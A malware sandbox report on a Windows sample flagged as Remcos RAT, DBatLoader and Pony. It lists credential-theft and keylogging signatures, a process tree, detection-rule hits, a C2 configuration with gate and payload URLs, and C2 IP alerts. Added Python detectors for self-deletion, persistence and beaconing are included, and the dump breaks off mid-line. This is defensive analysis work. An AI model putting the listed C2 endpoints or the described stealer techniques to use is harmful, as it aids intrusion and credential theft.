Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1574872
MD5: 21d13f2f3c4db8f083b672d81831fa5e
SHA1: b93f931a10a8a4b6f155b6b2ad9c5f9fbb3d71d0
SHA256: 17bb66d25ec39d1818cc01e067ea7139eef15dcb24bce24840666eede661a3c3
Tags: exe, user-jstrosch

Detection

Remcos, DBatLoader, Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Pony
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to detect virtual machines (IN instruction, VMware)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Pony trojan / infostealer detected
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name in its version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4084 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
    • SGS.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\SGS.exe" MD5: 31B2F8C329A601B145E7E71A6D120A7B)
      • SGS.exe (PID: 4720 cmdline: C:\Users\user\AppData\Local\Temp\SGS.exe MD5: 31B2F8C329A601B145E7E71A6D120A7B)
        • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 432 cmdline: C:\Users\user\Desktop\file.exe MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • file.exe (PID: 1076 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
    • SGS.exe (PID: 7148 cmdline: "C:\Users\user\AppData\Local\Temp\SGS.exe" MD5: 31B2F8C329A601B145E7E71A6D120A7B)
      • SGS.exe (PID: 6656 cmdline: C:\Users\user\AppData\Local\Temp\SGS.exe MD5: 31B2F8C329A601B145E7E71A6D120A7B)
        • cmd.exe (PID: 2220 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
  • cleanup
Name: Remcos (alias RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: EvilPony (alias Ponyshe)
Description: Privately modded version of the Pony stealer.
Attribution: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware configuration (Pony, extracted from 5.2.SGS.exe.400000.0.unpack):
{"C2 list": ["http://admino.ml/eme/gate.php", "http://admino.ml/eme/kachistub.exe"]}
Yara matches, initial sample:
  file.exe: rule JoeSecurity_DBatLoader (Yara detected DBatLoader; author Joe Security)

Yara matches, dropped files:
  C:\Users\user\AppData\Local\Temp\SGS.exe: rule JoeSecurity_DBatLoader (Yara detected DBatLoader; author Joe Security)
  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe: rule JoeSecurity_DBatLoader (Yara detected DBatLoader; author Joe Security)
  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe: rule JoeSecurity_DBatLoader (Yara detected DBatLoader; author Joe Security)

Yara matches, memory dumps:
  0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp: rule JoeSecurity_Remcos (Yara detected Remcos RAT; author Joe Security)
  0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp: rule Windows_Trojan_Remcos_b296e965 (description: unknown; author: unknown)
    0x17d0: $a2: Mutex_RemWatchdog
    0x680:  $a3: %02i:%02i:%02i:%03i
    0x6c4:  $a3: %02i:%02i:%02i:%03i
    0x1bac: $a3: %02i:%02i:%02i:%03i
  00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp: rule JoeSecurity_Remcos (Yara detected Remcos RAT; author Joe Security)
  00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp: rule JoeSecurity_Remcos (Yara detected Remcos RAT; author Joe Security)
  0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp: rule pony (Identify Pony; author Brian Wallace @botnet_hunter)
    0xf97: $s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    0x7b9: $s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
    0xdda: $s3: POST %s HTTP/1.0
    0xe03: $s4: Accept-Encoding: identity, *;q=0
    0xf10: $s4: Accept-Encoding: identity, *;q=0
  (only the first entries are shown here; the full table has 15 entries)

Yara matches, unpacked PEs:
  5.2.SGS.exe.400000.0.unpack: rule JoeSecurity_aPLib_compressed_binary (Yara detected aPLib compressed binary; author Joe Security)
  5.2.SGS.exe.400000.0.unpack: rule JoeSecurity_Pony (Yara detected Pony; author Joe Security)
  5.2.SGS.exe.400000.0.unpack: rule Windows_Trojan_Pony_d5516fe8 (description: unknown; author: unknown)
    0x1540c: $a1: \Global Downloader
    0x14b95: $a2: wiseftpsrvs.bin
    0x1526c: $a3: SiteServer %d\SFTP
    0x15260: $a4: %s\Keychain
    0x154ca: $a5: Connections.txt
    0x15811: $a6: ftpshell.fsi
    0x15f6c: $a7: inetcomm server passwords
  5.2.SGS.exe.400000.0.unpack: rule pony (Identify Pony; author Brian Wallace @botnet_hunter)
    0x13d97: $s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    0x15fb3: $s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    0x135b9: $s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
    0x13bda: $s3: POST %s HTTP/1.0
    0x13c03: $s4: Accept-Encoding: identity, *;q=0
    0x13d10: $s4: Accept-Encoding: identity, *;q=0
  5.2.SGS.exe.400000.0.unpack: rule Fareit (Fareit Payload; author kevoreilly)
    0x16202: $string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
  (only the first entries are shown here; the full table has 7 entries)
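The Fareit $string1 hit above is the raw bytes of a batch file, and its shape is consistent with the self-deletion script the report flags ("Drops / launches Pony Loader self-deletion script") and the cmd.exe /c "...bat" "...\SGS.exe" entries in the process tree, where the dropped .bat receives the executable path as %1. The YARA rule matches on the exact tab and space padding; the following added example (written here, not part of the Joe Sandbox report) decodes the visible prefix of that hex, collapses the padding, and recognises the self-deletion shape from the three lines the report shows (label, "del %1", "if exist %"). Because the report truncates the string with "...", the back-edge "goto" is not checked. The benign script and the regular expressions are constructed for illustration.

```python
import re

# Hex bytes of $string1 from the Fareit YARA match, exactly as printed in the
# report; the report truncates the string, so only this prefix is decoded.
FAREIT_STRING1_HEX = (
    "0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A "
    "20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 "
    "09 09 20 65 78 69 73 74 20 09 20 20 20 25"
)

# Constructed benign batch file, used only as a negative case.
BENIGN_BAT = "@echo off\r\ndel /q %TEMP%\\build.log\r\nif exist out.txt type out.txt\r\n"


def decode_hex_dump(hex_text):
    """Turn the space-separated hex from the YARA hit back into script text."""
    return bytes.fromhex(hex_text.replace(" ", "")).decode("ascii")


def normalize_batch(script):
    """Collapse the tab/space padding between tokens and drop blank lines, so
    matching does not depend on the exact padding the loader generated."""
    return [" ".join(line.split()) for line in script.splitlines() if line.strip()]


# Assumed shape of the loop: a label, deletion of the first argument, re-check.
LABEL = re.compile(r"^:(\w+)$")
DEL_ARG1 = re.compile(r"^del( /\w+)* %1$", re.IGNORECASE)
IF_EXIST = re.compile(r"^if exist %", re.IGNORECASE)


def self_delete_label(script):
    """Return the loop label if the script contains, in order, a label,
    'del %1' and an 'if exist %...' line; otherwise None."""
    lines = normalize_batch(script)
    for i in range(len(lines) - 2):
        m = LABEL.match(lines[i])
        if m and DEL_ARG1.match(lines[i + 1]) and IF_EXIST.match(lines[i + 2]):
            return m.group(1)
    return None


if __name__ == "__main__":
    script = decode_hex_dump(FAREIT_STRING1_HEX)
    print(normalize_batch(script))          # [':ktk', 'del %1', 'if exist %']
    print(self_delete_label(script))        # ktk
    print(self_delete_label(BENIGN_BAT))    # None
```

The padding is the reason the normalized form is worth keeping alongside the byte-exact YARA string: a rebuilt loader that changes the whitespace defeats the latter but not the former.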

System Summary

Sigma match, source: Network Connection; author: Florian Roth (Nextron Systems)
  Data: DestinationIp: 154.16.63.197, DestinationIsIpv6: false, DestinationPort: 3360, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 432, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
Sigma match, source: File created; author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4084, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Stealing of Sensitive Information

Sigma match, source: File created; author: Joe Security
  Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 432, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat
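The three Sigma events above come from two different file.exe processes: the Startup-folder write is from PID 4084 and the C2 connection from PID 432, so a per-process join would miss the pairing. As an added example (written here, not part of the report), the events are transcribed into Sysmon-style dicts and run through a correlation that joins a Startup-folder write (EventID 11) with an outbound connection to a non-baseline port (EventID 3) on the image path. The baseline port set is an assumption for illustration; the Remcos logs.dat write is kept in the sample as a negative case for the Startup check (the report's own "Sigma detected: Remcos" signature is what flags that file).

```python
from collections import defaultdict

# Sysmon-style records transcribed from the three Sigma matches in the report
# (constructed dicts; in practice they would come from EVTX or a SIEM).
EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\file.exe", "ProcessId": 4084,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"},
    {"EventID": 3, "Image": r"C:\Users\user\Desktop\file.exe", "ProcessId": 432,
     "Initiated": True, "Protocol": "tcp",
     "DestinationIp": "154.16.63.197", "DestinationPort": 3360},
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\file.exe", "ProcessId": 432,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\remcos\logs.dat"},
]

# Per-user Startup folder, matched case-insensitively inside the target path.
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
# Assumed baseline of ports an unknown binary may plausibly use; tune per environment.
BASELINE_PORTS = {80, 443, 8080, 8443}


def is_startup_write(ev):
    return ev["EventID"] == 11 and STARTUP_DIR in ev["TargetFilename"].lower()


def is_callback(ev, baseline=BASELINE_PORTS):
    """Outbound connection initiated by the process to a non-baseline port."""
    return (ev["EventID"] == 3 and ev.get("Initiated", False)
            and ev["DestinationPort"] not in baseline)


def correlate(events):
    """Return every image that both persisted via the Startup folder and
    called out to a non-baseline port. Keyed on the lower-cased Image path,
    not on ProcessId, because the write and the connection came from two
    instances of the same binary (PIDs 4084 and 432 in the report)."""
    startup = defaultdict(list)
    callbacks = defaultdict(list)
    for ev in events:
        key = ev["Image"].lower()
        if is_startup_write(ev):
            startup[key].append(ev["TargetFilename"])
        elif is_callback(ev):
            callbacks[key].append((ev["DestinationIp"], ev["DestinationPort"]))
    return {img: {"startup_files": startup[img], "callbacks": callbacks[img]}
            for img in startup if img in callbacks}


if __name__ == "__main__":
    for img, info in correlate(EVENTS).items():
        print(img, info["startup_files"], info["callbacks"])
```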
Suricata IDS alerts (SID 2022550, severity 1, classtype "A Network Trojan was detected"):
  2024-12-13T17:57:34.496629+0100  192.168.2.5:49704 -> 93.125.99.121:80 (TCP)

Suricata IDS alerts (SID 2829308, severity 1, classtype "Malware Command and Control Activity Detected"):
  2024-12-13T17:57:38.174795+0100  192.168.2.5:49705 -> 154.16.63.197:3360 (TCP)
  2024-12-13T17:58:05.189475+0100  192.168.2.5:49751 -> 154.16.63.197:3360 (TCP)
  2024-12-13T17:58:32.236209+0100  192.168.2.5:49815 -> 154.16.63.197:3360 (TCP)
  2024-12-13T17:58:59.393580+0100  192.168.2.5:49878 -> 154.16.63.197:3360 (TCP)
  2024-12-13T17:59:26.877943+0100  192.168.2.5:49942 -> 154.16.63.197:3360 (TCP)
  2024-12-13T17:59:53.972078+0100  192.168.2.5:49981 -> 154.16.63.197:3360 (TCP)
  2024-12-13T18:00:21.020725+0100  192.168.2.5:49982 -> 154.16.63.197:3360 (TCP)
  2024-12-13T18:01:15.096357+0100  192.168.2.5:49984 -> 154.16.63.197:3360 (TCP)
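The C2 alerts to 154.16.63.197:3360 are evenly spaced, with one double-length gap before the last alert. The following added example (written here, not part of the Joe Sandbox report) transcribes the alert rows into Python and computes per-destination inter-arrival times to flag periodic beaconing, tolerating jitter and a missed beacon. The 15% jitter tolerance and the minimum of four events are analyst-chosen thresholds, not values from the report.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Suricata alert rows transcribed from the report's tables:
# (timestamp, SID, destination IP, destination port). All are severity 1, TCP.
ALERTS = [
    ("2024-12-13T17:57:34.496629+0100", 2022550, "93.125.99.121", 80),
    ("2024-12-13T17:57:38.174795+0100", 2829308, "154.16.63.197", 3360),
    ("2024-12-13T17:58:05.189475+0100", 2829308, "154.16.63.197", 3360),
    ("2024-12-13T17:58:32.236209+0100", 2829308, "154.16.63.197", 3360),
    ("2024-12-13T17:58:59.393580+0100", 2829308, "154.16.63.197", 3360),
    ("2024-12-13T17:59:26.877943+0100", 2829308, "154.16.63.197", 3360),
    ("2024-12-13T17:59:53.972078+0100", 2829308, "154.16.63.197", 3360),
    ("2024-12-13T18:00:21.020725+0100", 2829308, "154.16.63.197", 3360),
    ("2024-12-13T18:01:15.096357+0100", 2829308, "154.16.63.197", 3360),
]


def parse_ts(ts):
    """Suricata timestamp with microseconds and a +HHMM UTC offset."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def beacon_candidates(alerts, min_events=4, jitter=0.15):
    """Group alerts by destination and keep destinations whose inter-arrival
    times are all an integer multiple of one period (within +/- jitter of
    it). Accepting multiples means a single dropped or blocked beacon
    (a gap of 2 x period) does not hide the pattern. min_events and jitter
    are analyst-chosen thresholds."""
    by_dst = defaultdict(list)
    for ts, _sid, ip, port in alerts:
        by_dst[(ip, port)].append(parse_ts(ts))

    found = {}
    for dst, times in by_dst.items():
        if len(times) < min_events:
            continue                      # too few samples to call periodic
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(deltas)           # robust against the odd long gap
        multiples = [round(d / period) for d in deltas]
        if all(k >= 1 and abs(d - k * period) <= jitter * period
               for d, k in zip(deltas, multiples)):
            found[dst] = {
                "events": len(times),
                "period_s": round(period, 1),
                "missed": sum(k - 1 for k in multiples),
            }
    return found


if __name__ == "__main__":
    for (ip, port), info in beacon_candidates(ALERTS).items():
        # prints: 154.16.63.197:3360 beacons every 27.1 s (8 alerts, 1 missed)
        print(f"{ip}:{port} beacons every {info['period_s']} s "
              f"({info['events']} alerts, {info['missed']} missed)")
```

The single port-80 alert to 93.125.99.121 is not reported: one event gives no interval, and the minimum-event threshold keeps one-off downloads out of the beacon list.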


                    AV Detection

Source: file.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Avira: detection malicious, Label: HEUR/AGEN.1331271
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1331271
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Avira: detection malicious, Label: HEUR/AGEN.1331271
Source: 5.2.SGS.exe.400000.0.unpack; Malware Configuration Extractor: Pony {"C2 list": ["http://admino.ml/eme/gate.php", "http://admino.ml/eme/kachistub.exe"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe; ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; ReversingLabs: Detection: 73%
Source: file.exe; ReversingLabs: Detection: 73%
Source: Yara match; File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
Source: Yara match; File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 93.2% probability
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Joe Sandbox ML: detected
Source: file.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040A712 lstrlenW, wsprintfA, wsprintfA, lstrlenW, CryptUnprotectData, LocalFree
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040D3BE CertOpenSystemStoreA, CertEnumCertificatesInStore, lstrcmp, lstrcmp, CryptAcquireCertificatePrivateKey, CryptGetUserKey, CryptExportKey, CryptExportKey, CryptDestroyKey, CryptReleaseContext, CertCloseStore
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040BC36 CryptUnprotectData, LocalFree, lstrlen, StrCmpNIA, lstrlen, StrCmpNIA, lstrlen, StrCmpNIA
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040A557 WideCharToMultiByte, lstrcmpiA, lstrcmpiA, lstrcmpiA, StrStrIA, CryptUnprotectData, LocalFree, CoTaskMemFree
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040A96D CredEnumerateA, lstrlenW, CryptUnprotectData, LocalFree, CredFree
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040CE3D lstrlen, CryptUnprotectData, LocalFree
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040AB24 lstrlen, CryptUnprotectData, LocalFree
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_004043DC CryptUnprotectData, LocalFree
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_004051E3 FindFirstFileA, lstrcmpiA, lstrcmpiA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_004041A6 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00404E73 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, StrStrIA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00408AE5 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00409832 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, StrStrIA, lstrlen, StrStrIA, StrStrIA, StrStrIA, FindNextFileA, FindClose
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00408961 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, FindNextFileA, FindClose
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00406920 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
11_2_00406920
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004065DB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$b